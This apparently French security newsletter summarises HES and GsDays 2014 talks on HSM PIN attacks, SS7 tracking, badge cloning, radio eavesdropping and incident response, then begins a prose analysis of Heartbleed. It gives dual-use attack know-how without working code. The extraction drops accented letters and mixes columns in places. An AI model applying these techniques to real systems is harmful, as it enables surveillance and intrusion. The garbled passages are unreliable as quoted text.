Security_Modules:attacks_and_secure_conguration_Gra-
ham_Steel_hes2014.pdf
Graham Steel a ensuite parl des Modules Matriel de S-
curit (HSM). Les HSM sont des quipements cryptogra-
phiques ayant pour fonction de conserver les cls prives
dans les infrastructures de gestion des cls (applications
gouvernementales, guichets automatiques, systmes de
paiement). Ces quipements et leur contenu sont rputs
inviolables.
Graham prend pour exemple la gnration de code PIN par
un HSM, et montre quen inuant sur les diffrentes entres
fournies lquipement, et laide de multiples essais, il
est possible dobtenir des informations partielles sur le PIN
gnr (valeur de certains chiffres du PIN), voir le PIN com-
plet.
An dillustrer ces principes, Graham a prsent les diff-
rentes attaques dj connues et les informations quelles
permettent de rcuprer ( ISO-0 Reformatting attack ,
Extended Reformat Attack , Statistical Attack , etc.)
OSMOSIS Open Source Monitoring Security Issues
Christian Sielaff & Daniel Hauenstein
+
Slides
http://2014.hackitoergosum.org/slides/day2_OSMOSIS_
HES2014.pdf
Pour terminer cette seconde journe, Christian Sielaff &
Daniel Hauenstein ont prsent OSMOSIS (Open Source
Monitoring Security Issues). La principale question tait :
Comment proter des solutions de supervision an de com-
promettre un rseau ?
An de mener bien leur tude, ils ont examin plusieurs
solutions bases sur des logiciels Open Source (CACTI, NA-
GIOS, ICINGA, Check_mk). Ces dernires prsentent de
nombreux avantages : libres et gratuites, mais la scurit et
les failles lies peuvent apporter de nombreuses problma-
tiques sur un rseau.
Lanalyse de ces produits a permis didentier de nom-
breuses failles (XSS, des CSRF, des RCE, Buffer Overow, etc.)
les ayant conduits jusqu lobtention dun Shell persistant.
Ceci leur a permis de contourner les restrictions rseau et
de rebondir vers le rseau interne de lentreprise.
Enn, des solutions de mitigation ont t prsentes an
de prvenir ces attaques (il sagit dans la plupart des cas de
bonnes pratiques mettre en place ct dveloppement).
Les vulnrabilits ont t remontes aux diteurs, mais
seuls NAGIOS et Icinga ont ralis une mise jour de leur
application. Dautres diteurs se sont montrs moins colla-
boratifs (absence de rponse, rejet de laudit, etc.)
HES
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
35
> Jour 3
Suricata 2.0, Netlter and the PRC
ric Leblond
+
Slides
http://2014.hackitoergosum.org/slides/day3_suricata_net-
lter_prc_eric_leblond.pdf
Cette troisime et dernire journe de confrence fut ini-
tie par ric Leblond. Ce dernier a prsent les amliora-
tions sur lapplication Suricata.
Suricata est un IDS (Intrusion Detection System) Open
Source charg didentier les activits suspectes au niveau
des trames rseau, en se basant sur des rgles dnies par
ladministrateur laide du langage LUA.
Pour cela, Suricata sappuie sur une architecture multithread
performante an dexploiter pleinement les ressources des
systmes modernes et une identication des protocoles de
manire prcise an de permettre une bonne granularit
des rgles et rduire le nombre de faux positifs.
Les capacits de cet outil permettent la ralisation de nom-
breuses tches : extraction des chiers transitant sur le r-
seau, vrication de la validit des chanes de certication
lors dune connexion entre un client et un serveur distant
(prvention des attaques par interception de ux), etc. Il
offre de plus une lecture facilite des logs via une interface
sduisante et permettant lextraction de statistiques (repr-
sentation sous forme de graphiques, camemberts, etc.).
La prsentation a t illustre par la dtection par Su-
ricata de requtes malveillantes ciblant la vulnrabilit
Heartbleed.
Suricata avait t dvelopp par Victor Julien et Matthew
Konkmann, qui ont fond pour cela la fondation Open Infor-
mation Security Foundation (OISF). Il offre une alternative
de plus en plus crdible face son concurrent Snort.
Worldwide attacks on SS7 network
Alexandre De Oliveira & Pierre-Olivier Vauboin
+
Slides
http://2014.hackitoergosum.org/slides/day3_Worldwide_
attacks_on_SS7_network_P1security_Hackito_2014.pdf
Alexandre De Oliveira et Pierre-Olivier Vauboin, consultants
chez P1 Security, ont prsent des attaques ralisables sur
les rseaux de tlphonie mobile. Ces attaques exploitent
des vulnrabilits au niveau du cur de rseau de lopra-
teur et au niveau des terminaux mobiles.
La prsentation a commenc par un rappel des composants
et du fonctionnement des architectures tlcom (2G/3G).
Alexandre et Pierre-Olivier ont ensuite insist sur le fonc-
tionnement du protocole SS7, utilis pour les changes
entre les composants du rseau.
Une fois la partie thorique acheve, des scnarios dat-
taque concrets ont t illustrs. Aprs avoir ralis une
reconnaissance des diffrents quipements sur le rseau
dun oprateur, les chercheurs de P1 ont ainsi t capables
de localiser la position des utilisateurs connects ce r-
seau tlphonique. Ils ont de plus t capables dmettre
des appels ou des SMS depuis le numro de leur choix,
lchelle nationale et internationale
En n de confrence, des solutions de mitigation ont t
prsentes. Nanmoins, celles-ci sont encore imparfaites et
peuvent tre contournes.
A common weakness in RSA signatures: extracting pu-
blic keys from communications and embedded devices
Renaud Lifchitz
+
Slides
http://2014.hackitoergosum.org/slides/day3_A_com-
mon_weakness_in_RSA_signatures:extracting_public_
keys_from_communications_and_embedded_devices_Re-
naud_Lifchitz_hes2014.pdf
Lors de cette confrence, le franais Renaud Lifchitz, consul-
tant chez Oppida, nous a prsent des mthodes dextrac-
tion de la cl publique en analysant des signatures de mes-
sages.
En effet, il peut arriver malgr son nom que la cl publique
ne soit pas publie (communications entre terroristes, cl
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
36
embarque au sein dun quipement ferm, etc.).
Renaud Lifchitz a tout dabord rappel le fonctionnement
de la cryptographie asymtrique, dans son cas lalgorithme
RSA, ainsi que les diffrentes mthodes actuelles connues
pour factoriser de grands nombres entiers (recherche de
petits facteurs dans de grands nombres ou recherche de
grands facteurs dans de petits nombres).
Il a ensuite rappel la construction dune signature crypto-
graphique et dmontr comment il tait possible dextraire
une cl publique en ne possdant que deux messages ini-
tiaux et leurs signatures.
Si la prsentation semblait trs thorique, il a ensuite mon-
tr une application pratique de cette vulnrabilit sur le
badge Vigik. Ce badge permet aux agents des services na-
tionaux (La Poste, EDF, France Telecom, etc.) daccder aux
immeubles.
Ce badge nest valable que temporairement dans le temps
et doit tre rinitialis rgulirement. Les institutions
publiques possdent une cl prive qui va signer un mes-
sage contenu au sein du badge. Les lecteurs contiennent
les cls publiques des diffrentes entreprises et vrient la
validit de la signature.
Aprs avoir revers le fonctionnement des badges, Renaud
a t capable dextraire leur contenu (signatures RSA) et de
cloner les diffrents badges. En rutilisant la vulnrabilit
prcdemment identie, il a de plus t capable diden-
tier les cls publiques de chacun des organismes (France
Telecom, La Poste, etc.)
Ruby on Rails exploitation and effective backdooring
Joernchen of Phenoelit
Joernchen of Phenoelit a conclu cette dition de la HES en
nous prsentant des vulnrabilits lies au framework web
Ruby on Rails , bas sur le langage de programmation
Ruby.
Joernchen a commenc par rappeler le fonctionnement de
Ruby on Rails, larchitecture MVC utilise par le framework
et larborescence dun projet standard.
Il nous a ensuite prsent les vulnrabilits classiques ren-
contres sur cet environnement : labsence de contrles et
dassainissement sur les paramtres (comme dans beau-
coup dautres langages) pouvant mener diffrents types
dinjection (SQL, code, etc.). De plus, le framework prsente
aussi diffrentes vulnrabilits au niveau de la gestion et
du traitement des sessions (sessions persistantes dune
connexion lautre, injection de code d un mauvais trai-
tement des cookies de session, etc.)
Lensemble de la prsentation sest appuy sur des mi-
ni-exemples de chacun de ces cas.
HES
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
37
GsDays
Confrence plnire
La Confrence plnire accueillait Alain Juillet, Prsident
du CDSE (Club des Directeurs de Scurit des Entreprises)
et Patrick Chambet (Responsable du Centre de Scurit
Groupe, C2S - Groupe Bouygues).
Elle tait anime par Jrme Saiz, Rdacteur en Chef de
Qualys Magazine.
Cette confrence avait pour ambition de rpondre la
question : Protection des liberts individuelles et respect de
la vie prive : peut-on encore y croire ?
Plusieurs sujets ont t abords, notamment les rvla-
tions de lancien consultant Edward Snowden, linternet des
objets, mais galement lexploitation de failles de scuri-
t par des rseaux de cybercriminels, ladoption de la Loi
de Programmation Militaire ou encore de celle relative la
Golocalisation. Nous vous proposons ici un retour sur les
principaux sujets qui ont marqu cette confrence.
Le dbat a tout dabord port sur les impacts des publica-
tions dEdward Snowden pour la scurit en entreprise. Les
intervenants voient deux priodes distinctes. Celle avant les
rvlations et celle daprs.
Avant celles-ci, on supposait que certaines agences pro-
cdaient des coutes massives de la population, mais
aussi des chefs dtat et membres des gouvernements. On
se doutait aussi que le centre de donnes de la NSA en
construction en Utah tait un signe des capacits impor-
tantes de lagence. ce titre, en 2013, Forbes estimait de 3
12 exabytes (millions de tera-octets) sa capacit de stoc-
kage. Les capacits de lagence suscitaient ainsi tous les
fantasmes des professionnels.
On tait cependant trs loin des faits. Nous navions au-
cune ide des moyens utiliss, des volumes enregistrs et
de la crativit de lagence pour nuire la vie prive des
Internautes. Ces rvlations ont montr que ce que certains
appelaient de la paranoa tait bien rel. Les agences de
renseignements nont aujourdhui presque aucune limite.
Pour Alain Juillet et Patrick Chambet, cela dmontre le be-
soin de nommer un Responsable de la Scurit des Sys-
tmes dInformation en entreprise. Et limpact sest vite fait
ressentir, on a pu observer une explosion de lutilisation du
protocole HTTPS pour le chiffrement des pages web, ainsi
que du chiffrement S-MIME pour les emails.
Ces rvlations nont pas uniquement touch les profes-
sionnels de la scurit. Les utilisateurs ont aussi t sensibi-
liss de facto par les mdias grands publics. Les spcialistes
craignaient dailleurs que ce soit phmre et que des com-
portements dangereux rapparaissent.
La conversation a ensuite volu vers linternet des objets,
une grande proccupation lheure actuelle.
Aujourdhui, lorsque nous envoyons des donnes sur Inter-
net, il sagit dune action choisie. lavenir ce ne sera pro-
bablement plus le cas. Les prmices sen font sentir ds
prsent. En effet, certains vhicules sont capables de com-
muniquer des donnes techniques avec leur fabricant. Lob-
jectif annonc tant damliorer la qualit des vhicules en
comprenant mieux les sources de problmes. Nanmoins,
les constructeurs peuvent connatre nimporte quelle don-
ne des utilisateurs, tels que leur localisation, leur vitesse
moyenne et maximale, ainsi que leurs habitudes.
> Confrences scurit
par Etienne BAUDIN
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
38
Au CES de Las Vegas taient prsents les premiers objets
connects. Ces derniers allaient de la balance, au rfrig-
rateur. La proccupation est qu lavenir, il ne sera plus
possible de choisir les donnes qui seront ainsi mises en
ligne. Tous nos objets de la vie courante seront connects
et pourront nous apporter divers services en envoyant sur
le web nos donnes personnelles.
La seconde grande proccupation lie ces systmes est
leur scurit. Bruce Schneier lindiquait rcemment dans un
billet publi sur son blog. Dune part, ces systmes com-
municants ne bncient gnralement pas de mises
jour. Dautres parts, il nest pas rare de sapercevoir que les
systmes embarqus sont vulnrables, voire mme dj
exploits alors mme quils viennent dtre achets. Selon
Schneier, le problme provient de la chaine de fabrication
qui ne prend pas du tout en compte les problmatiques
de scurit. La situation actuelle serait pire que dans les
annes 1990 lorsque les logiciels et les systmes dexploi-
tation contenaient des failles de scurit critiques particu-
lirement difciles corriger. titre dexemple, des rfrig-
rateurs connects, ou autres webcams autonomes auraient
dj t impliqus dans certaines attaques.
Pour les deux intervenants, cest donc ds aujourdhui quil
faut traiter ces problmatiques avant quelles ne nous sub-
mergent. Il faut que la notion de respect de la vie prive soit
intgre au mme titre que laccent mis sur les nouvelles
fonctionnalits et les promesses de ces nouveaux outils.
Cest sur ces diffrentes problmatiques, qui montrent une
vision pessimiste de la situation actuelle que les Global Se-
curity Days 2014 ont t lancs.
War Stories from the Cloud
Emmanuel Mac, Akamai Technologies
+
Slides
http://www.globalsecuritymag.fr/chiers/gsdays2014/
FICHIERS/PRESENTATION/Presentation-AKAMAI.pdf
Akamai est une socit amricaine qui met disposition
des serveurs de cache pour les entreprises. Retour sur plu-
sieurs attaques par dni de service qui ont t observes
par Akamai.
En 2012, suite la publication dune vido amricaine an-
ti-islam, lopration Ababil a t lance. Dimportants dnis
de service distribus ont ainsi t raliss sur des banques
notamment. Cette vague dattaque a dur environ un an.
La premire phase de cette attaque tait une attaque par
rexion DNS. Elle a dur environ deux mois. Il sagissait
dune attaque applicative, limite sur la couche 7 du mo-
dle OSI.
La seconde phase a eu lieu en janvier. Pour les quatre
banques cibles, Akamai avait pu dcharger le trac sans
impact rel sur les sites de leurs clients.
La troisime phase a dmarr dbut mars. Un pic de 4 mil-
lions de requtes par minute a pu tre observ, soit 70 fois
le trac normal. Akamai russissait galement prserver
le volume de donnes envoy au site origine.
La dernire phase a eu lieu n juillet. Des pics de 4,4 mil-
lions de requtes HTTP par minute ont pu tre observs.
Linfrastructure DNS avait aussi t cible.
Akamai a observ lan dernier des attaques sophistiques
et importantes. Daprs son exprience, lentreprise a rete-
nu que les attaques sont plus fortes et plus rapides quau-
paravant. Elles sattaquent des couches non protges
telles que les couches 3 ou 7 du modle OSI.
La charte informatique face aux nouveaux usages en
entreprise
Frdric Connes et Amlie Paget, Herv Schauer Consultants
+
Slides
http://www.globalsecuritymag.fr/chiers/gsdays2014/FI-
CHIERS/CONFERENCE/Conf-Frederic-Connes+Amelie-PAGET.
pdf
Frdric Connes et Amlie Paget, deux consultants travail-
lant chez HSC ont prsent lvolution de la charte informa-
tique en entreprise.
En effet, il est important de dnir une charte en accord
avec lapparition des nouveaux usages de loutil informa-
tique. Que ce soit le BYOD, le Cloud, les rseaux sociaux ou
encore la mobilit, il est ncessaire dencadrer leur dploie-
ment pour assurer la maitrise du Systme dInformation.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
39
Selon HSC, an de disposer dune charte informatique mo-
derne, il est important de spcier les droits et devoirs des
utilisateurs dans la charte informatique pour :
+
le BYOD : la charte ne doit pas se limiter aux smart-
phones ou ordinateurs personnels, mais tous les objets
pouvant contenir des donnes de lentreprise (exemple :
Google Glasses, dictaphones) ;
+
la mobilit ;
+
la sauvegarde de donnes sur smartphone : lorsquun
utilisateur ralise une sauvegarde de ses donnes sur son
ordinateur personnel, des donnes de lentreprise pour-
raient y tre enregistres ;
+
le BYOS (Bring Your Own Service) : il sagit dautoriser
ou dinterdire des services tels que Dropbox, Box.com ou
autres, qui sont des outils personnels utiliss des ns pro-
fessionnelles ;
+
le partage de connexion 3G/4G : via lutilisation de tels
systmes, le trac est invisible pour les outils de scurit de
lentreprise ;
+
autorisation ou restriction du WiFi et du VPN ;
+
le COPE (Corporate Owned, Personnaly Enabled) : mise
disposition de lordinateur par lentreprise qui peut tre
utilis dans un cadre personnel ;
+
la biomtrie des ns dauthentication, quelle soit
implmente sur tlphone ou ordinateur ;
+
lusage des rseaux sociaux au sein de lentreprise des
ns personnelles ou professionnelles.
Gestion des comptes privilges
Christophe Guguen, Harmonie Technologie
+
Slides
http://www.globalsecuritymag.fr/chiers/gsdays2014/
FICHIERS/CONFERENCE/Conf-Christophe-GUEGUEN.pdf
Le directeur technique de la socit Harmonie Technologie
a prsent une confrence abordant le sujet de la gestion
des risques lis aux comptes privilges.
Christophe Guguen est revenu sur limportance de ces
comptes qui font courir lentreprise des risques de type :
+
oprationnel ;
+
conformit ;
+
et scurit.
Diffrentes problmatiques sont associes ces risques :
+
augmentation du nombre de systmes grer ;
+
diminution des effectifs ;
+
raccourcissement du time to market ;
+
en terme de conformit diverses normes (PCI DSS par
exemple) lies au modle conomique et au secteur dac-
tivit de lentreprise. Elles ncessitent souvent de respecter
diffrentes rglementations pour lamlioration de la scu-
rit du SI.
+
en terme de scurit de lentreprise pouvant engendrer
des pertes nancires, une indisponibilit du service, un vol
de donnes, ainsi quune dgradation de limage de la so-
cit.
La solution que recommande Harmonie Technologie, pour
GsDays 2014
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
40
Dmonstrations dattaques radios
Renaud Lifchitz, Oppida
+
Slides
http://www.globalsecuritymag.fr/chiers/gsdays2014/
FICHIERS/CONFERENCE/Conf-ARCSI-Renaud-Lifchitz.pdf
Renaud Lifchitz a prsent diffrentes attaques radios par
coute passive, brouillage, et usurpation.
En effet, de nombreux outils de communication utilisent
des canaux radio et ne sont pas ou peu chiffrs. Il est ds
lors plus ou moins ais de raliser ces types dattaques.
Lors de ses dmonstrations, le confrencier a pu montrer
quavec des moyens restreints il tait possible dcouter les
communications issues de tlphones de type DECT ou de
casques sans l.
Pour cela, il a utilis une cl USB permettant de recevoir la
TNT, connecte une antenne. En temps normal, le chipset
de cette cl ne permet de recevoir que sur une plage de fr-
quences restreinte. Cependant cette limitation est logicielle
et peut tre contourne pour couvrir une plage beaucoup
plus importante. La cl utilise cote seulement 20 et ne
supporte pas lmission dondes radio. Des outils plus per-
formants permettant dmettre sont disponibles partir de
200 (jusqu 1500).
La partie logicielle, quant elle, repose sur le projet GNU
Radio Companion sur un systme Ubuntu. Celui-ci permet
de traiter les ux radio reus par la cl. En slectionnant la
bonne plage de frquence, il est alors possible dcouter les
ondes radio reues par un casque sans l.
Il est galement possible de golocaliser en temps rel les
avions. En effet, ceux-ci transmettent leur position aux tours
de contrle au travers dun protocole non chiffr. Pour cela,
le logiciel dump1090 est disponible. Il permet de connatre
la position des avions proximit, mais aussi dautres in-
formations telles que la vitesse actuelle de lappareil. Ces
couvrir ces risques est dutiliser un ensemble de fonction-
nalits autour de la gestion des comptes dadministration
et des administrateurs. Trois grands thmes sont donc n-
cessaires :
+
lIAM pour la gestion des mots de passe des comptes
partags ;
+
le SSO pour la gestion des accs des comptes privi-
lges ;
+
le SIEM pour la supervision.
Il a ensuite prsent un retour dexprience an den com-
prendre les difcults techniques et organisationnelles lies
la mise en place de tels outils. Il a mis laccent sur des
rexions avoir sur larchitecture en place et les modes
opratoires des quipes. Enn, il a galement voqu plu-
sieurs aspects structurants considrer :
+
linventaire des comptes privilges ;
+
la mise en uvre de rgles de traitement des comptes
dans les applications ;
+
la dnition et la maintenance des prols dadministra-
tion;
+
la mise en uvre dune gouvernance;
+
et enn, la dnition dune gestion du changement.
GsDays 2014
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
41
informations peuvent tre exportes an de visualiser les
trajectoires des avions via Google Maps.
Par ailleurs, les communications GSM sont elles aussi ac-
cessibles facilement. Les projets AirProbe et OsmocomBB
en sont des exemples. Le premier permet dcouter, d-
moduler puis analyser les donnes GSM captes. Le second
permet, lui, de rpertorier sur une carte les utilisateurs du
rseau proximit.
La scurit des ondes radios est donc critique lheure ac-
tuelle. Les protocoles souffrent de labsence de chiffrement,
dauthentication, de signature, de mcanismes anti-rejeu
ou encore anti-brouillage.
Ceci rete limportance de penser la scurisation ds la
conception des protocoles (security by design) et non une
fois quils sont implments. La scurisation du primtre
physique est pour lheure souvent la seule solution de
contournement.
Get-IncidentResponse
Julien Bachmann et Sylvain Pionchon, SCRT
+
Slides
http://www.globalsecuritymag.fr/chiers/gsdays2014/
FICHIERS/CONFERENCE/Conf-Julien-Bachmann+Sylvain-Pion-
chon.pdf
Deux ingnieurs en scurit de la socit SCRT ont ralis
une prsentation traitant de la prvention et de lanalyse
de cyber-attaques.
Ces ingnieurs sont partis du constat que les dfenses
actuelles quelles soient primtriques, antivirales, ou
base dIDS, ne permettent pas de rpondre un incident.
lheure actuelle, un incident est bien souvent dtect
lorsque le mtier de lentreprise est impact. Ce type dinci-
dent est souvent difcilement traable cause de labsence
ou du manque de donnes.
Pour rpondre cette problmatique, ils proposent dutili-
ser des journaux dvnements disponibles. Pour cela, ils
ont tent de rpondre aux traditionnelles problmatiques
quils apportent :
+
le besoin de grandes ressources pour trier ;
+
la difcult pour reprer les vnements suspicieux ;
+
la difcult pour limiter le bruit (Target tait par exemple
dbord par les alertes).
Pour commencer, ils ont montr la partie reconnaissance
dune attaque. Durant cette phase, le pirate cherchera
connatre les machines actives et les services accessibles. Il
ralisera pour cela un scan de ports et partira la recherche
de sessions anonymes.
Ils ont montr que ces recherches pouvaient tre dcou-
vertes facilement dans les chiers de logs via lutilisation
de Powershell.
De la mme faon, ils ont pu montrer quil tait facilement
possible dobserver dans les journaux dvnements diff-
rents types dvnements suspects :
+
larrt inopin dapplication ;
+
des attaques par recherche exhaustive ;
+
des attaques par extraction de condensat ;
+
des attaques dextraction des mots de passe depuis la
mmoire.
Ils ont aussi mis en valeur le logiciel EMET (Enhanced Miti-
gation Experience Toolkit) qui permet de raliser une dtec-
tion avance des attaques.
Post-exploitation, le pirate cherchera lever ses privilges,
garder un accs ou exltrer des donnes.
Il est donc ncessaire denregistrer les modications ap-
portes plusieurs privilges dangereux tels que SeDe-
bugPrivilege . Ils conseillent aussi de comparer les hash
dexcutables potentiellement malveillants avec des outils
en ligne ou locaux. cette n, ils proposent lutilisation
dAppLocker (dployable par GPO) pour bloquer/dtecter
des programmes non utiliss.
Concernant les comptes, il est ncessaire de surveiller la
cration de comptes dans lActive Directory :
+
lajout dans un groupe privilgi ;
+
les comptes sans expiration ;
+
les comptes verrouills, dverrouills ou supprims.
Powershell, qui permet dautomatiser toutes ces tches, est
donc la solution idale pour trouver les informations dans
lActive Directory et dans les journaux dvnements Win-
dows.
Enn, concernant les connexions rseaux, les deux interve-
nants suggrent de :
+
surveiller les requtes HTTP, FTP, IRC ou encore SMTP ;
+
se baser sur des listes noires en ligne dIP/DNS ;
+
didentier les connexions vers lextrieur (netstat
ano) ;
+
danalyser les journaux dvnements des requtes
DNS.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
42
La nouvelle base de donnes obligatoire du Comit
dEntreprise : comment organiser la divulgation dinfor-
mations stratgiques et protger le secret des affaires ?
Diane Mullenex et Guillaume Bellmont, Pinsent Masons LLP
+
Slides
http://www.globalsecuritymag.fr/chiers/gsdays2014/
FICHIERS/CONFERENCE/Conf-Diane-Mullenex+Guil-
laume-BELLMONT.pdf
Les deux avocats Diane Mullenex et Guillaume Bellmont
ont prsent lorganisation de limplmentation de la loi du
14 juin 2013 en entreprise. Cette loi impose aux entreprises
de plus de 50 salaris de mettre en place une base de don-
nes conomique et sociale unique (BDU). Cette base de
donnes doit tre mise en place avant le 14 juin 2014 pour
les entreprises de plus de 300 salaris et avant le 14 juin
2015, pour celle de moins de 300.
Un dcret publi le 27 dcembre spcie le type dinforma-
tion qui doit y tre stocke.
Les informations contenues dans cette base de donnes
sont destination des instances reprsentatives du person-
nel (IRP).
Cette rforme soulve des questions relatives :
+
la mise en conformit des entreprises aux nouvelles
rgles ;
+
la scurit des informations sensibles hberges dans la
base de donnes ;
+
la revue globale de la gouvernance de lentreprise en
matire de gestion du secret des affaires ;
+
larchitecture mme de la base de donnes ;
+
lexamen des ressources informatiques de lentreprise.
Cette prsentation a tent de rpondre ces questions au
sens juridique.
Lobjectif de cette rforme est triple :
+
mettre disposition des informations ncessaires la
consultation du CE sur les orientations stratgiques de len-
treprise ;
+
donner une vision claire et globale de la formation et
de la rpartition de la valeur cre par lactivit de lentre-
prise;
+
donner laccs lensemble des informations dores et
dj communiques de manire rcurrente au CE.
Il convient tout dabord de mettre en place une stratgie
garantissant la fois les intrts de lentreprise et la confor-
mit aux nouvelles exigences.
Il est par ailleurs essentiel dvaluer et de prciser, le cas
chant, le caractre condentiel des documents
Enn il est important de protger le secret des affaires via
diverses mesures telles que :
+
lanticipation et la coordination des acteurs du projet ;
+
la mise en place daccord, de charte et de clauses ;
+
la mise en place de mesures techniques.
Plus dinformations
http://www.gsdays.fr/
GsDays 2014
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
43
Recherches
Analyse de la faille Heartbleed (CVE-2014-0160)
Par Cyril LORENZETTO
Vulnrabilits
Apple vs SSL
Par David WEBER
Tendance
Prsentation de la monnaie la mode : le Bitcoin
par Arnaud REYGNAUD
LActualit du moment
ACTUA
LIT
DU
MOMENT
Que sest-il pass au cours de ces dernires
semaines au sein du petit monde de la
scurit informatique ?
Revenons sur la faille de lanne
(Heartbleed) affectant OpenSSL puis sur
limplmentation SSL au sein des produits
Apple. Enn, nous terminerons par une pr-
sentation des BitCoins
T
a
r
a
n
g

h
i
r
a
n
i

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
44
La faille et les versions vulnrables
La vulnrabilit rfrence CVE-2014-0160 [4] impacte
uniquement lextension HeartBeat , implmente au
sein de certaines versions dOpenSSL. Cela signie que
les versions dOpenSSL compiles sans le support de cette
extension (ag -DOPENSSL_NO_HEARTBEATS activ lors de
la compilation), et les versions dans lesquelles cette exten-
sion navait pas encore t introduite (versions antrieures
OpenSSL 1.0.1 : 0.9, 0.8) ne sont pas concernes.
De mme, les serveurs (Apache, Nginx,) tirant parti
dOpenSSL et offrant la possibilit de dsactiver lutilisation
de TLS ne sont pas vulnrables, lorsque TLS est dsactiv,
bien entendu.
Les consquences
La faille est lie un manque de validation des informa-
tions contenues dans le message de HeartBeat. Il en r-
sulte quun pirate est en mesure de provoquer une faille
de type buffer over-read , an daccder des donnes
prsentes en mmoire, dans la limite de 64 Ko.
Lexploitation de cette vulnrabilit permet de lire alatoi-
SSL et TLS sont sous pression ces derniers temps. Aprs la
faille surnomme GotoFail [1], une nouvelle faille cri-
tique impactant les implmentations de transport de don-
nes sur le rseau (SSL/TLS) par la bibliothque OpenSSL
[2] a rcemment t divulgue. Cette vulnrabilit a fait
normment parler delle, car elle permettait distance de
voler des informations critiques stockes en mmoire.
Quest-ce quOpenSSL et HeartBeat ?
OpenSSL est une bibliothque permettant entre autres de
protger les communications sur Internet laide des proto-
coles SSL et TLS. HeartBeat est une extension des protocoles
TLS (et DTLS) implmente au sein dOpenSSL. Celle-ci cor-
respond aux RFC6520 [3] et RFC5847 [3].
OpenSSL est utilis par de nombreux serveurs tels que les
serveurs Web ( commencer par Apache) pour mettre en
uvre le clbre protocole HTTPS. Cette bibliothque est
cependant inclue dans de nombreux autres logiciels dont
notamment des serveurs IMAPS, FTPS, POP3S, mais aussi
des clients tels que cURL.
S
n
o
o
p
s
m
a
u
s
HeartBleed, OpenSSL touch
en plein coeur !
par Cyril LORENZETTO
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
45
rement une partie de la mmoire dun systme vulnrable.
Pour cela, il suft simplement dtablir une session SSL,
puis denvoyer un message Heartbeat.
De plus en rptant cette opration, il est possible dobtenir
de nouvelles informations issues de la mmoire.
Cela permet donc potentiellement daccder des informa-
tions sensibles, telles que :
+
des clefs prives associes aux certicats SSL utiliss
pour chiffrer le trac ;
+
des identiants de connexion appartenant aux visiteurs
dun site ;
+
les en-ttes HTTP comprenant notamment les cookies
de sessions ou lauthentication Basic permettant dusurper
lidentit dun internaute.
Lorigine de la dcouverte
La vulnrabilit Heartbleed a t divulgue lundi 7 avril au
soir [5]. Elle a t dcouverte par plusieurs chercheurs de
manire simultane, alors mme que ces derniers travail-
laient de manire isole. Les chercheurs en question sont
Neel Mehta, qui travaille pour Google, ainsi quune quipe
de la socit Codenomicon [6], constitue des chercheurs
Riku, Antti et Matti.
Alors que Google avait contact les dveloppeurs dOpenSSL
pour les alerter de lexistence de la faille et proposer un cor-
rectif de scurit [7], les chercheurs de Codenomicon ont
prfr contacter le CERT Finlandais NCSC-FI [8] pour lui d-
lguer la tche de coordination.
Au nal, mme si cette faille a t rapporte de manire
responsable OpenSSL qui a nalement rvl son exis-
tence en publiant le correctif de scurit, il a rsult de
cette double dcouverte un certain cafouillage. En effet,
tous les acteurs concerns par le dploiement rapide dun
correctif (diteurs de distribution Linux, gants de lInternet
tels que Amazon [9] (ou encore l [10]), Cloudare [11]
et autre CDN) nont pas eu le mme niveau dinformation
au mme moment. Les dveloppeurs dOpenSSL ont donc
t obligs de publier leur correctif prmaturment avec un
jour davance sur le planning initialement prvu.
Analyse de la vulnrabilit
Comme indiqu prcdemment, Heartbeat est une nou-
velle extension du protocole TLS (et DTLS) qui offre le sup-
port de connexions persistantes (keep-alive). Ceci permet
dviter une rengociation des cls de session, amliorant
ainsi les performances. Cette extension rajoute deux mes-
sages : heartbeat_request et heartbeat_response. Ils per-
mettent au client de faire une demande heartbeat et au
serveur de rpondre cette demande.
Daprs la RFC6520 (page 3, section 4 [3]), la structure dun
message de type Heartbeat est la suivante :
+
type : le type du message (heartbeat_request ou heart-
beat_response);
+
payload_length : la taille du payload, reprsente le
nombre doctets du payload arbitraire qui sera renvoy par
le serveur;
+
padding : donnes alatoires qui doivent tre ignores
par le receveur.
Les messages Heartbeat passent par la structure SSL3_RE-
CORD suivante :
+
length : reprsente la taille en octet du message Heart-
beat reu;
+
data : pointeur sur le dbut du message.
> INFO
La NSA exploiterait Heartbleed depuis plus de 2 ans
Selon le groupe Bloomberg, la NSA avait connaissance de la vul-
nrabilit Heartbleed depuis plusieurs annes et laurait exploi-
te des ns de surveillance.
Les spculations au sujet de cette faille ne cessent de croitre. Il
est actuellement trs difcile de distinguer les informations qui
sont vridiques de celles qui alimentent les diverses polmiques
et le FUD sur Internet.
Bloomberg a ainsi publi un article attestant que la NSA tait
parfaitement au courant de lexistence de cette faille et quelle
laurait exploite de nombreuses reprises an dobtenir des
renseignements. Les sources anonymes du journal parlent de
deux annes durant lesquelles lagence aurait gard le secret en
invoquant la scurit nationale.
Linformation a bien videmment t dmentie par la NSA qui
de son ct dclare navoir dcouvert cette vulnrabilit quau
moment de sa publication. Elle prcise par ailleurs quelle aurait
immdiatement averti la communaut responsable dOpenSSL si
elle avait eu connaissance de son existence.
Source :
http://www.bloomberg.com/news/2014-04-11/nsa-said-to-
have-used-heartbleed-bug-exposing-consumers.html
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
46
type du message est rcupr dans la variable hbtype. En-
suite, le pointeur est incrment de 1 octet pour pointer sur
le champ suivant qui reprsente la taille du payload.

La macro n2s permet de rcuprer la taille du payload et de
la stocker dans la variable nomme payload.
Le pointeur p est incrment de deux octets an de pointer
sur le contenu du payload. Le pointeur pl pointe galement
dessus.
Comme dit prcdemment, si un serveur reoit un message
avec 65535 de taille de payload (payload_length) 65535,
alors ceci est quivalent, au vue du code dune version vul-
nrable dOpenSSL, recevoir un message contenant 64Ko
de payload. Le serveur se doit donc de renvoyer ces 64Ko,
avec un octet pour stocker le type du message, deux octets
pour stocker la taille du payload et enn le padding (au
moins 16 octets).
